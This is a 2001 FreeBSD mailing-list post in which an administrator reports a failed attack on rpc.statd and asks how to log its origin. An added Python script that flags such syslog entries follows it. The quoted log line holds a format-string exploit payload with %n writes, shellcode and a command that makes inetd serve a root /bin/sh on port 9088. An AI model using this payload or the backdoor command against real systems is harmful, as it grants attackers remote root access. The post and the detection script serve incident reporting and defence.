Date:      Thu, 4 Jan 2001 09:06:55 -0600
From:      Eric_Stanfield@kenokozie.com
To:        freebsd-questions@freebsd.org
Subject:   hack attempt (again) - help
Message-ID:  <OF4CA83D7A.DC3A3B98-ON862569CA.00526722@kka.com>

Alright this jerkoff has once again attempted to hack one of my freebsd
machines by trying what I assume is a buffer overflow to rpc:

Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=
=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM=
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P=
M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^=
PM-^PM-^PM-^PM-^P=EBK^M-

v=ACM-^C=EE M-^M^(M-^C=C6 M-   ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB=
#M-  ^=B41=C0M-^C=EE
M-^HF'M-^HF*M-^C=C6 M-^HF=ABM-    F=B8=B0+, M-   =F3M-^MN=ACM-^MV=B8=CD=
M-^@1=DBM-
=D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root =
/bin/sh -i" >>
/tmp/m; /usr/sbin/inetd /tmp/m;

The interesting bit is what he (she?) is attempting to sneak in at the end
of the garbage sent to the port.

I've given the system a thorough check and this seems to have been a second
failed attempt.  I'm now annoyed, however, and would like to be able to at
least log what address this stuff is originating from.   Can anyone suggest
something from the ports that would do the trick?  I've disabled nfs/rpc
but I'm sure the hacker will come knocking again.

Thanks.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Eric Stanfield, K2Access
Keno Kozie and Associates
222 N LaSalle #1500
Chicago, IL 60606
(312) 332-3000
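
Added example, not part of the original message: a small Python scan that flags rpc.statd "Invalid hostname to sm_mon" syslog entries whose hostname field carries format directives, %n writes, a syslog-escaped 0x90 run (M-^P) or an embedded /bin/sh command, as in the entry quoted above. The function name, the thresholds and the sample lines are constructed for illustration, and one syslog entry per line is assumed.

```python
import re

# "Jan  3 23:19:23 host rpc.statd: Invalid hostname to sm_mon: <name>"
ENTRY = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\srpc\.statd(?:\[\d+\])?:\s"
    r"Invalid hostname to sm_mon:\s?(?P<name>.*)$"
)
DIRECTIVE = re.compile(r"%(?:\d+\$)?\d*[a-zA-Z]")   # any printf-style directive
WRITE = re.compile(r"%(?:\d+\$)?\d*h{0,2}n")        # %n family: memory writes
SLED = re.compile(r"(?:M-\^P){8,}")                 # 0x90 bytes as syslog prints them


def scan_statd_log(lines):
    """Return one finding per suspicious sm_mon entry (assumed: one entry per line)."""
    findings = []
    for line in lines:
        m = ENTRY.match(line.rstrip("\n"))
        if not m:
            continue  # not an rpc.statd sm_mon rejection
        name = m["name"]
        hits = {
            "directives": len(DIRECTIVE.findall(name)),
            "writes": len(WRITE.findall(name)),
            "nop_sled": bool(SLED.search(name)),
            "shell_cmd": "/bin/sh" in name,
        }
        # A legitimate hostname contains none of these markers.
        if hits["directives"] or hits["nop_sled"] or hits["shell_cmd"]:
            findings.append({"ts": m["ts"], "host": m["host"], **hits})
    return findings


# Constructed sample lines (shortened, inert; not the payload from the message).
SAMPLE = [
    "Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: "
    "%08x %08x %08x %0242x%n%055x%n" + "M-^P" * 12 + "/bin/sh -c true",
    "Jan  3 23:25:01 mrtg rpc.statd: Invalid hostname to sm_mon: bad/name",
    "Jan  3 23:30:00 mrtg sshd[412]: Connection closed",
]

if __name__ == "__main__":
    for finding in scan_statd_log(SAMPLE):
        print(finding)
```

The statd entry itself carries no peer address, so a hit only yields a timestamp to correlate against a packet capture or firewall log.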
